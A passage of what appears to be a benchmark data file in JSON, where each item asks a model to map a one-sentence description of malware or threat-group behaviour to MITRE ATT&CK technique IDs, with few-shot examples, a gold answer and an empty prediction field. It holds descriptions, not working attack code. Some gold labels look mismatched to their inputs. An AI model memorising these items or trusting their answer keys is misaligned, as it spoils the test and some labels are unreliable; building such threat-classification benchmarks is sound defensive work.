The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Threat Group-3390 has used RAR to compress, encrypt, and password-protect files prior to exfiltration.\n\t - T1560.002: Archive Collected Data - Archive via Library\n- Text: SombRAT has encrypted collected data with AES-256 using a hardcoded key.\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n- Text: KONNI has encrypted data and files prior to exfiltration.\n\t - T1560: Archive Collected Data\n", + "input": "SeaDuke compressed data with zlib prior to sending it over C2.", + "gold": "- T1560.002: Archive Collected Data - Archive via Library", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: macOS.OSAMiner has embedded Stripped Payloads within another run-only Stripped Payloads.\n\t - T1027.009: Obfuscated Files or Information - Embedded Payloads\n- Text: concatenates then decompresses multiple resources to load an embedded .Net Framework assembly.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: Volgmer uses a simple XOR cipher to encrypt traffic and files.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", + "input": "ComRAT has embedded a XOR encrypted communications module inside the orchestrator module.", + "gold": "- T1027.009: Obfuscated Files or Information - Embedded Payloads", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: NOKKI has downloaded a remote module for execution.\n\t - T1105: Ingress Tool Transfer\n- Text: 1) Use PowerShell Constrained Language Mode as it uses IEX, Add-Type, and New-Object. 2) Lock PowerShell Execution Policy, must be set to \u201cAllSigned\u201d via GPO. 3) An allowlisting solution to prevent certain process child-parent execution hierarchies\n\t - T1559.002: Inter-Process Communication - Dynamic Data Exchange\n- Text: has used AOL Instant Messenger for C2.\n\t - T1102: Web Service\n", + "input": "Cobalt Strike can deliver additional payloads to victim machines.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: To achieve privilege escalation within the environment, FIN6 utilized a named pipe impersonation technique included within the Metasploit framework that allows for SYSTEM-level privilege escalation\n\t - T1134: Access Token Manipulation\n- Text: This function will either bind the calling process to a port or has the calling process connect to a remote host. The function is called in the following manner\n\t - T1134.002: Access Token Manipulation - Create Process with Token\n- Text: APT28 has used several malicious applications that abused OAuth access tokens to gain access to target email accounts, including Gmail and Yahoo Mail.\n\t - T1550.001: Use Alternate Authentication Material - Application Access Token\n", + "input": "KillDisk has attempted to get the access token of a process by calling \"OpenProcessToken\". If KillDisk gets the access token, then it attempt to modify the token privileges with \"AdjustTokenPrivileges\".", + "gold": "- T1134: Access Token Manipulation", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: 2) When contacted, the Google Drive link retrieves a zip file, which contains a .lnk file obfuscated as a .pdf file using the double extension trick. 3) This file requires the target to attempt to open the .lnk file, which redirects the user to a Windows Scripting Component (.wsc) file, hosted on an adversary-controlled microblogging page. MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs. 4) The .lnk file uses an embedded VBScript component to retrieve a decoy PDF file and a PowerShell script from the adversary-controlled web page\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: Gamaredon Group has used `mshta.exe` to execute malicious HTA files.\n\t - T1218.005: System Binary Proxy Execution - Mshta\n- Text: Saint Bot can download additional files onto a compromised host.\n\t - T1105: Ingress Tool Transfer\n", + "input": "Mustang Panda has embedded VBScript components in LNK files to download additional files and automate collection.", + "gold": "- T1059.005: Command and Scripting Interpreter - Visual Basic", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Kimsuky has gathered credentials using Mimikatz and ProcDump.\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n- Text: secretsdump.py: Performs various techniques to dump secrets from the remote machine without executing any agent there. For DIT files, we dump NTLM hashes, Plaintext credentials (if available) and Kerberos keys using the DL_DRSGetNCChanges() method. It can also dump NTDS.dit via vssadmin executed with the smbexec/wmiexec approach. mimikatz.py: Mini shell to control a remote mimikatz RPC server developed by @gentilkiwi\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n\t - T1003.003: OS Credential Dumping - NTDS\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n- Text: When executing the code, the browser creates an invisible image tag and sets the URL to an attack server using the file:// protocol scheme. On Windows machines, this triggers a request to a remote server via the Samba networking protocol (SMB) that also transmits the user\u2019s login NTLM hash. These hashes can be cracked to retrieve the original login password by methods of brute-force, dictionary, or rainbow table lookups\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n\t - T1003.005: OS Credential Dumping - Cached Domain Credentials\n\t - T1555: Credentials from Password Stores\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n", + "input": "APT33 has used a variety of publicly available tools like LaZagne, Mimikatz, and ProcDump to dump credentials.", + "gold": "- T1003.001: OS Credential Dumping - LSASS Memory", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: As seen in Figure 2, the VBA code builds the email body and attaches the malicious document to the email. We\u2019ve seen both .docx and .lnk files being used as attachments. These are very similar to the content of the malicious attachments used in Gamaredon\u2019s initial spearphishing campaigns. Figure 3 shows an email generated by this malicious component\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: On November 9, 2018, we observed a relatively small email campaign (thousands of messages) delivering a new malware family that we call \u201cServHelper\u201d based on file names associated with infection. The campaign primarily targeted financial institutions and was attributed to the threat actor TA505. The messages (Figure 1) contained Microsoft Word or Publisher attachments with macros that, when enabled, downloaded and executed the malware. This campaign used the \u201ctunnel\u201d variant of ServHelper, described in the \u201cMalware Analysis\u201d section\n\t - T1204.001: User Execution - Malicious Link\n\t - T1204.002: User Execution - Malicious File\n- Text: Initial access via a phishing email that linked to a google docs page that enticed the user to download a report, which was a Bazar Loader executable file instead Report-Review20-10.exe\n\t - T1566.002: Phishing - Spearphishing Link\n", + "input": "Lazarus Group has targeted victims with spearphishing emails containing malicious Microsoft Word documents.", + "gold": "- T1566.001: Phishing - Spearphishing Attachment", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Emotet has been seen exploiting SMB via a vulnerability exploit like EternalBlue (MS17-010) to achieve lateral movement and propagation.\n\t - T1210: Exploitation of Remote Services\n- Text: APT32 has deployed tools after moving laterally using administrative accounts.\n\t - T1570: Lateral Tool Transfer\n- Text: The story of a Linux miner bundled with pirated copies of VST (Virtual Studio Technology) software for Windows and macOS\n\t - T1189: Drive-by Compromise\n", + "input": "Bad Rabbit used the EternalRomance SMB exploit to spread through victim networks.", + "gold": "- T1210: Exploitation of Remote Services", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: RAR Creates RAR files per logical drive containing data with timestamps for the past 7 days, then uploads RAR to the C2 server using a POST command at the path \u201c/FeedBack.php\u201d\n\t - T1041: Exfiltration Over C2 Channel\n\t - T1560: Archive Collected Data\n- Text: BoxCaon has created a working folder for collected files that it sends to the C2 server.\n\t - T1074.001: Data Staged - Local Data Staging\n- Text: UNC2452 staged data and files in password-protected archives on a victim's OWA server.\n\t - T1074.002: Data Staged - Remote Data Staging\n", + "input": "Leviathan has archived victim's data prior to exfiltration.", + "gold": "- T1560: Archive Collected Data", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: can capture screenshots of the victim\u2019s machine.\n\t - T1113: Screen Capture\n- Text: In 2014, Imminent Monitor started supporting third-party plugins. The first of these offered the ability to turn the webcam light off while monitoring. Shockwave\u2122 wrote: \u201cHey, good job on being the first to release a plugin for Imminent Monitor\n\t - T1125: Video Capture\n- Text: SLOTHFULMEDIA has a keylogging capability.\n\t - T1056.001: Input Capture - Keylogging\n", + "input": "gh0st RAT can capture the victim\u2019s screen remotely.", + "gold": "- T1113: Screen Capture", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In addition to loading the communications module, the initial macro described above configures a persistence mechanism for this malware loader by setting up\u202fa\u202fRegistry\u202fRun key. The non-concatenated command included in the macro that establishes persistence for Libcurl.dll and the hash for this sample are included below\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: SILENTTRINITY can modify registry keys, including to enable or disable Remote Desktop Protocol (RDP).\n\t - T1112: Modify Registry\n- Text: Volgmer checks the system for certain Registry keys.\n\t - T1012: Query Registry\n", + "input": "Dragonfly 2.0 added the registry value ntdll to the Registry Run key to establish persistence.", + "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: An APT19 Port 22 malware variant registers itself as a service.\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: Winnti for Windows can run as a service using svchost.exe.\n\t - T1569.002: System Services - Service Execution\n- Text: Operation Wocao has used the \"tasklist\" command to search for one of its backdoors.\n\t - T1007: System Service Discovery\n", + "input": "RainyDay can create and register a service for execution.", + "gold": "- T1007: System Service Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Stuxnet enumerates user accounts of the domain.\n\t - T1087.002: Account Discovery - Domain Account\n- Text: CrackMapExec can dump hashed passwords associated with Active Directory using Windows' Directory Replication Services API (DRSUAPI), or Volume Shadow Copy.\n\t - T1003.003: OS Credential Dumping - NTDS\n- Text: The threat actor used RDP on Active Directory using leaked accounts. The actor dropped scanning tools, Nmap.exe and Nping.exe, for scanning the network. Next, the scheduled task was pushed by the group policy domain machine.\n\t - T1484: Domain or Tenant Policy Modification\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n", + "input": "Meteor can use `WinAPI` to remove a victim machine from an Active Directory domain.", + "gold": "- T1106: Native API", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FireEye assesses APT33 may be behind a series of intrusions and attempted intrusions within the engineering industry. FireEye's Managed Defense has responded to and contained numerous intrusions that we assess are related. The actor is leveraging publicly available tools in early phases of the intrusion; however, we have observed them transition to custom implants in later stage activity in an attempt to circumvent our detection\n\t - T1555: Credentials from Password Stores\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n\t - T1003.005: OS Credential Dumping - Cached Domain Credentials\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n\t - T1552.006: Unsecured Credentials - Group Policy Preferences\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n\t - T1588.002: Obtain Capabilities - Tool\n- Text: HOPLIGHT has used svchost.exe to execute a malicious DLL .\n\t - T1569.002: System Services - Service Execution\n- Text: Operation Wocao has used ProcDump to dump credentials from memory.\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n", + "input": "Silence has obtained and modified versions of publicly-available tools like Empire and PsExec.", + "gold": "- T1588.002: Obtain Capabilities - Tool", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cardinal RAT and its watchdog component are compiled and executed after being delivered to victims as embedded, uncompiled source code.\n\t - T1027.004: Obfuscated Files or Information - Compile After Delivery\n- Text: Exploits a kernel privilege escalation vulnerability to gain SYSTEM privileges using CVE-2018-8453. REvil uses Hypertext Transfer Protocol Secure (HTTPS) for communication with its controllers\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: Squirrelwaffle has encoded its communications to C2 servers using Base64.\n\t - T1132.001: Data Encoding - Standard Encoding\n", + "input": "BLINDINGCAN has sent user and system information to a C2 server via HTTP POST requests.", + "gold": "- T1041: Exfiltration Over C2 Channel", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Imminent Monitor has a remote webcam monitoring capability.\n\t - T1125: Video Capture\n- Text: EvilGrab has the capability to capture audio from a victim machine.\n\t - T1123: Audio Capture\n- Text: can capture a screenshot from a victim.\n\t - T1113: Screen Capture\n", + "input": "Derusbi is capable of capturing video.", + "gold": "- T1125: Video Capture", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Bundlore can install malicious browser extensions that are used to hijack user searches.\n\t - T1176: Browser Extensions\n- Text: BLUELIGHT can harvest cookies from Internet Explorer, Edge, Chrome, and Naver Whale browsers.\n\t - T1539: Steal Web Session Cookie\n- Text: Security Intelligence . Topics . Tricks of the Trade: A Deeper Look Into TrickBot\u2019s Machinations . TrickBot is a new banking Trojan. An Unusual Man-in-the-Browser Technique . Nowadays, most modern financial malware families are capable of injecting malicious code into ongoing browser sessions (e.g. For this purpose, and much like other advanced banking Trojans, TrickBot deploys a browser-hooking engine designed to intercept communications to and from the victim\u2019s internet browser. With the real-time fetching trick, the malicious code injections themselves are kept securely on the attacker\u2019s server, not in a file on the victim\u2019s endpoint. 7) Finally, TrickBot\u2019s financial module replaces the original response that would normally come from the bank with the C2\u2019s response, and the injected page is displayed on the victim\u2019s end. The actor can turn the webinjections on or off on the fly, easily modify the injections and then push an update to some or all the infected victims instantaneously. Figure 2: TrickBot\u2019s Server Side Web-Injects \u2014 Top Level Flow. Figure 5: TrickBot and Dyre both use \u201csourcelink\u201d and \u201csourcequery\u201d for their communications. TrickBot passes the target URLs list to its financial module, which is injected into the browser using pipes communication. A redirection attack, in short, means that instead of injecting malicious code into the original webpage, the victim is now redirected to a new site forged by the fraudsters\n\t - T1185: Browser Session Hijacking\n", + "input": "Grandoreiro can use malicious browser extensions to steal cookies and other user information.", + "gold": "- T1176: Browser Extensions", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Every time the malware runs a command using cmd.exe, the standard output (STDOUT) of the executed command is piped and written to a Google Drive account with the following filename format\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: uses cmd.exe to execute commands on the victim\u2019s machine.\n\t - T1059: Command and Scripting Interpreter\n- Text: Kinsing has used Unix shell scripts to execute commands in the victim environment.\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n", + "input": "TSCookie has the ability to execute shell commands on the infected host.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: AppleJeus has sent data to its C2 server via \"POST\" requests.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: njRAT uses Base64 encoding for C2 traffic.\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: The compressed_data field is compressed using the common ZLIB compression algorithm. Additionally, in the event data is being sent via HTTP rather than HTTPS, the following additional encryption algorithm is applied to the POST data\n\t - T1560.002: Archive Collected Data - Archive via Library\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", + "input": "BBK has the ability to use HTTP in communications with C2.", + "gold": "- T1071.001: Application Layer Protocol - Web Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The Emissary Trojan will use this GUID value provided by the C2 server as an encryption key that it will use to encrypt data sent in subsequent network communications\n\t - T1027: Obfuscated Files or Information\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: Machete's collected data is encrypted with AES before exfiltration.\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n- Text: RogueRobin base64 encodes strings that are sent to the C2 over its DNS tunnel.\n\t - T1132.001: Data Encoding - Standard Encoding\n", + "input": "Sakula encodes C2 traffic with single-byte XOR keys.", + "gold": "- T1573.001: Encrypted Channel - Symmetric Cryptography", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: We have discovered that malware dubbed WinDealer, spread by Chinese-speaking APT actor LuoYu, has an ability to perform intrusions through a man-on-the-side attack\n\t - T1204.001: User Execution - Malicious Link\n\t - T1566.002: Phishing - Spearphishing Link\n\t - T1566.001: Phishing - Spearphishing Attachment\n\t - T1566.002: Phishing - Spearphishing Link\n\t - T1120: Peripheral Device Discovery\n- Text: TSCookie has been executed via malicious links embedded in e-mails spoofing the Ministries of Education, Culture, Sports, Science and Technology of Japan.\n\t - T1204.001: User Execution - Malicious Link\n- Text: BazarLoader is Windows-based malware spread through various methods involving email\n\t - T1588.001: Obtain Capabilities - Malware\n\t - T1587.001: Develop Capabilities - Malware\n\t - T1566.002: Phishing - Spearphishing Link\n\t - T1566.001: Phishing - Spearphishing Attachment\n\t - T1534: Internal Spearphishing\n\t - T1598.002: Phishing for Information - Spearphishing Attachment\n\t - T1566: Phishing\n", + "input": "Molerats has sent phishing emails with malicious links included.", + "gold": "- T1566.002: Phishing - Spearphishing Link", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The attacker then executed a persistent malicious PowerShell code that was used to download and execute another PowerShell backdoor file in the server from the malicious IP address 185[.]82[.]219[.]201, as shown in Figure 7.\n\t - T1590.005: Gather Victim Network Information - IP Addresses\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n\t - T1027.003: Obfuscated Files or Information - Steganography\n\t - T1216: System Script Proxy Execution\n\t - T1546.013: Event Triggered Execution - PowerShell Profile\n\t - T1059: Command and Scripting Interpreter\n\t - T1064: Scripting\n- Text: Gamaredon Group has deployed scripts on compromised systems that automatically scan for interesting documents.\n\t - T1119: Automated Collection\n- Text: The initial CVE-2019-19781 exploitation activity on January 20 and January 21, 2020, involved execution of the command \u2018file /bin/pwd\u2019, which may have achieved two objectives for APT41. Second, it may return architecture-related information that would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step\n\t - T1083: File and Directory Discovery\n", + "input": "OilRig has used .doc file extensions to mask malicious executables.", + "gold": "- T1036: Masquerading", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: A backdoor used by created a Tor hidden service to forward traffic from the Tor client to local ports 3389 (RDP), 139 (Netbios), and 445 (SMB) enabling full remote access from outside the network.\n\t - T1090.003: Proxy - Multi-hop Proxy\n- Text: REvil has encrypted C2 communications with the ECIES algorithm.\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n- Text: NOKKI has used FTP for C2 communications.\n\t - T1071.002: Application Layer Protocol - File Transfer Protocols\n", + "input": "Attor has used Tor for C2 communication.", + "gold": "- T1090.003: Proxy - Multi-hop Proxy", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: (Source: Dell SecureWorks) In SWCs analyzed by CTU researchers, the threat actors added the Dean Edwards packed JavaScript code shown in Figure 9 to the end of a legitimate website's menu page\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n- Text: The loaded module is a simple dropper. Upon loading the module, the AutoOpen method will be invoked. The malicious code in this method drops the final payload executable into %AppData%\\service.exe and executes it (see Figure 6)\n\t - T1574.005: Hijack Execution Flow - Executable Installer File Permissions Weakness\n\t - T1574: Hijack Execution Flow\n\t - T1569.002: System Services - Service Execution\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: The execution of the malicious PuTTY binary resulted in the deployment of a backdoor to the host. The deployed backdoor is an evolution of the malware family Mandiant tracks as AIRDRY.\n\t - T1218: System Binary Proxy Execution\n", + "input": "TeamTNT has used UPX and Ezuri packer to pack its binaries.", + "gold": "- T1027.002: Obfuscated Files or Information - Software Packing", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Empire can acquire network configuration information like DNS servers, public IP, and network proxies used by a host.\n\t - T1016: System Network Configuration Discovery\n- Text: The last one is used by this setup, and in this mode the ransomware encrypts the files on all available mapped network drives\n\t - T1486: Data Encrypted for Impact\n\t - T1564.006: Hide Artifacts - Run Virtual Instance\n- Text: can be used to gather information about the operating system.\n\t - T1082: System Information Discovery\n", + "input": "Darkhotel has collected the IP address and network adapter information from the victim\u2019s machine.", + "gold": "- T1016: System Network Configuration Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The 